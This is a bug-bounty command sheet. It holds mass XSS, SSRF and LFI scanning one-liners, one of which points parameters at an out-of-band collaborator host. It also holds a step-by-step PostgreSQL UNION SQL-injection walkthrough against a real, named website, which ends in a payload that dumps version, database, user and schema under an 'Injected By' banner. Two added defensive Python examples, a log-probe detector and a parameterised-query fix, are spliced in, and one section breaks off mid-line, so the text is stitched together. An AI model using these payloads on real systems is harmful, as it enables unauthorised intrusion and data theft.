Bug Bounty Helpful Commands

XSS

  cat file.txt | gf xss | grep 'source=' | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable\n"; done

To get URLs from websites and feed them to dalfox:

  waybackurls target.com | tee urlss.txt
  dalfox file urlss.txt          (or pipe the URL list into dalfox pipe)

SSRF

  findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net

LFI (follow this command to find LFI)

  findomain -t example.com -q | waybackurls | gf lfi | qsreplace FUZZ | while read url; do ffuf -u "$url" -mr "root:x" -w ~/wordlist/LFI.txt; done

Find JS files on target.com

  https:/...
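As an added defender-side example (not part of the original post and not code from any of the tools it names), here is a Python script that parses access-log lines in combined log format and flags the kinds of probes the commands above send: the reflected-XSS canary, a parameter pointed at an out-of-band host, and a path-traversal payload. The sample log lines, the allow-list of hosts the application may fetch from (ALLOWED_FETCH_HOSTS), and the traversal markers are constructed assumptions for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format), not taken from the
# original page. The first three mimic the probes the commands above send: a
# reflected-XSS canary, a parameter pointed at an out-of-band host, and a
# path-traversal attempt; the last two are ordinary traffic.
SAMPLE_LOG = r'''
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?source=%22%3E%3Cscript%3Econfirm(1)%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "curl/7.88.1"
203.0.113.10 - - [10/Oct/2023:13:55:37 +0000] "GET /fetch.php?url=http%3A%2F%2Fabc123.burpcollaborator.net%2F HTTP/1.1" 200 88 "-" "curl/7.88.1"
203.0.113.10 - - [10/Oct/2023:13:55:38 +0000] "GET /view.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /news.php?key=17 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /fetch.php?url=https%3A%2F%2Fcdn.example.com%2Flogo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Hosts this application is allowed to fetch from (assumed for the example).
ALLOWED_FETCH_HOSTS = {"cdn.example.com"}
XSS_MARKERS = ("<script", "onerror=", "onload=", "javascript:")
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|/etc/passwd|root:x:)", re.IGNORECASE)


def classify_target(target):
    """Return the sorted list of probe classes found in a request target's query string."""
    _, _, query = target.partition("?")
    findings = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes one layer; decode once more so that a
        # double-encoded payload (%2522 -> %22 -> ") is still seen.
        decoded = unquote_plus(value)
        lowered = decoded.lower()
        if any(marker in lowered for marker in XSS_MARKERS):
            findings.add("xss_probe")
        if TRAVERSAL_RE.search(decoded):
            findings.add("lfi_probe")
        if lowered.startswith(("http://", "https://")):
            host = urlsplit(decoded).hostname or ""
            if host not in ALLOWED_FETCH_HOSTS:
                findings.add("ssrf_probe")
    return sorted(findings)


def scan_log(text):
    """Parse combined-format lines; return (ip, target, findings) for the suspicious ones."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        findings = classify_target(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


def probes_per_ip(hits):
    """Count flagged requests per source IP; a scanner shows several classes from one IP."""
    counts = {}
    for ip, _target, _findings in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, target, findings in hits:
        print(ip, ",".join(findings), target)
    print(probes_per_ip(hits))
```

Decoding the query string before matching matters: the scanners above send the canary URL-encoded, so a rule that greps the raw log line for `<script>` misses it. The per-IP count is the cheap signal for a mass scan (one source hitting several probe classes in seconds), which is what these one-liners look like from the server side.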

SQLi Challenges Solution

 

Please follow the steps 


===========Solution===========

http://zoutou(.)net/news_shousai.php?key=17

Let's start checking for the vulnerability by adding a single quote (').

http://zoutou(.)net/news_shousai.php?key=17'

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" at character 59 in /home/zoutou-web/public_html/news_shousai.php on line 99

This is the error: the quote opened a string that is never closed. Note that the warning also leaks the script path and line number.

Let's fix this.

http://zoutou(.)net/news_shousai.php?key=17'--+-

Not fixed: the -- sits inside the string the quote opened, so it does not act as a comment.

Let's try

http://zoutou(.)net/news_shousai.php?key=17--

Yes. Fixed.

Since the key is compared as a number, -- on its own comments out the rest of the query.

Let's count columns.

http://zoutou(.)net/news_shousai.php?key=17 order by 1-- 💡

http://zoutou(.)net/news_shousai.php?key=17 order by 100-- 💔

ORDER BY 1 gives no error and ORDER BY 100 gives an error, so ORDER BY works here and we can narrow it down.

ORDER BY 5 gives no error.

ORDER BY 6 gives an error.

So the query has 5 columns.

Let's Union select

http://zoutou(.)net/news_shousai.php?key=17+AND+0+UNION+SELECT+1,2,3,4,5--

But still error.

Let's see which error is this.

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: argument of AND must be type boolean, not type integer in /home/zoutou-web/public_html/news_shousai.php on line 99

The argument of AND must be boolean.

That is the problem here.

We used AND 0, and 0 is an integer.

OK, let's use AND 1=0 instead.

1=0 is a boolean expression.

🙂

But still error.

Let's see again which error is this.

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: UNION types text and integer cannot be matched in /home/zoutou-web/public_html/news_shousai.php on line 99

This error says that each UNION column must match the type of the original query's column: the column it complains about is text, so integer literals won't do.

OK, let's make them strings by quoting each value.

Put a quoted value in every column.

Follow me.

So this still fails:

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+1,2,3,4,5--

And this works:

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+'1','2','3','4','5'--

I hope you got it.

🙂

Ok. Let's check version.

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+'1','2','3',version(),'5'--

Here we got,

PostgreSQL 8.1.21 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-48)

It is PostgreSQL 🙂

Ok let's print basic info.

Follow me.

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+'1','2','3',database(),'5'--

Not able to print the database name this way. 🙂

Let's change it to

current_database()

Yes 🙂

zoutou123

OK, let's print user(). But since database() didn't work, I don't think user() will work either.

In this case let's try current_user.

OK, let's print everything in one column. In MySQL we separate the pieces with commas, but in PostgreSQL we have to use the || concatenation operator instead, like this:

'Injected By Fr0z3n F14m3'||'<br>'||version()||'<br>'||current_database()||'<br>'||current_user||'<br>'||123

Full query:

http://zoutou(.)net/news_shousai.php?key=17 AND 0=1 UNION SELECT '1','2','<br><br><br><font color="red"><b>Injected By Fr0z3n F14m3<br>'||'<img src="https://avatars.githubusercontent.com/u/76582042?v=4" width=100 height=100>'||'<br>Version :: '||version()||'<br>Database Name :: '||current_database()||'<br>User Name :: '||current_user||'<br></b></font><br><br>'||(SELECT ARRAY_TO_STRING(array(SELECT('[....] '||table_name||' :: '||column_name)::TEXT FROM information_schema.columns WHERE table_schema='public'),'<br>')),'4','5'--+-

happy hacking.
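The whole walkthrough above works because the key parameter is pasted straight into the SQL string and the PostgreSQL error text is echoed to the browser. As an added example that is not from the original post, the Python below shows that pattern beside the fix: validate the parameter as an integer, bind values as query parameters, and return only a generic error to the client. It uses an in-memory sqlite3 table as a stand-in for the PostgreSQL news table (the schema, column names and rows are constructed assumptions), so it runs offline; the same parameter binding applies with a PostgreSQL driver.

```python
import sqlite3

# Constructed stand-in for the news table the page queries; the schema and rows
# are assumptions for this example. sqlite3 is used because it ships with Python.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT, posted TEXT)"
    )
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?, ?, ?)",
        [
            (17, "Opening hours", "We open at nine.", "editor", "2023-10-10"),
            (18, "New menu", "Autumn specials.", "editor", "2023-10-11"),
        ],
    )
    return conn


def fetch_news_vulnerable(conn, key):
    """The pattern behind the walkthrough: the request parameter is pasted into the SQL."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=" + key
    return conn.execute(sql).fetchall()


class BadRequest(Exception):
    """Raised for input that fails validation; the client gets no query or path details."""


def fetch_news_safe(conn, key):
    """Check the parameter is an integer, then bind it; the value can never become SQL."""
    try:
        key_int = int(key)
    except (TypeError, ValueError):
        raise BadRequest("key must be an integer")
    return conn.execute(
        "SELECT id, title, body, author, posted FROM news WHERE id=?", (key_int,)
    ).fetchall()


def fetch_by_author_safe(conn, author):
    """Same rule for text parameters: a bound string is data, quotes and -- included."""
    return conn.execute(
        "SELECT id, title FROM news WHERE author=?", (author,)
    ).fetchall()


def handle_request(conn, key):
    """HTTP-style wrapper: generic messages go to the client, details stay in the server log."""
    try:
        rows = fetch_news_safe(conn, key)
    except BadRequest:
        return 400, "bad request"
    except sqlite3.Error:
        # Log the exception server-side; never echo it like the pg_exec() warning above.
        return 500, "internal error"
    if not rows:
        return 404, "not found"
    return 200, rows[0][1]


if __name__ == "__main__":
    conn = make_db()
    payload = "17 AND 1=0 UNION SELECT '1','2','3','4','5'--"
    print("vulnerable:", fetch_news_vulnerable(conn, payload))  # attacker-chosen row comes back
    print("safe:", handle_request(conn, payload))                # (400, 'bad request')
    print("safe:", handle_request(conn, "17"))                   # (200, 'Opening hours')
    print("author:", fetch_by_author_safe(conn, "' OR 1=1--"))   # []
```

The integer check alone would already stop the injected key, but binding is the rule to keep: fetch_by_author_safe shows that a text parameter carrying a quote and a comment marker is compared as a literal string and matches nothing. The generic 400/404/500 responses remove the second thing the walkthrough relied on, the verbose pg_exec() warning that told the author which database it was and what went wrong at each step.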
